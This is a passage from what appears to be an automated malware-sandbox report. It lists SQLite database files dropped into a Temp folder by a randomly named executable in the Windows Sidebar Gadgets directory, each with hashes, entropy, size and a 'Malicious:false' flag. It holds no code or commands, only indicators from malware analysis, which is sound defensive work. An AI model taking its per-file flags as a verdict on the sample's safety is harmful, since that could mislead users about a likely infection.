
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\kwqbyFm1UU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\lwmQmkkrqW

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\m48UHMrWqj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\mRJgkSCWWe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\mmf5J2TPHQ

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\nV3JJsfc2n

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\naFY3c2I9f

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\oTpaODvzz9

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\oVZFjs2ZBI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\p17PQasXES

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\p1FHkpTYXf

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pKuq2T805Y

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\pcrI40CMwy

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qDU908nQcx

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qPhFoNbKaT

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qiIQPdFECO

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\qtpBfLEu7d

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rBRaGTPNJI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\rdjAxIHsnm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\sIg9d24oR6

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\smgpPmVAYs

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
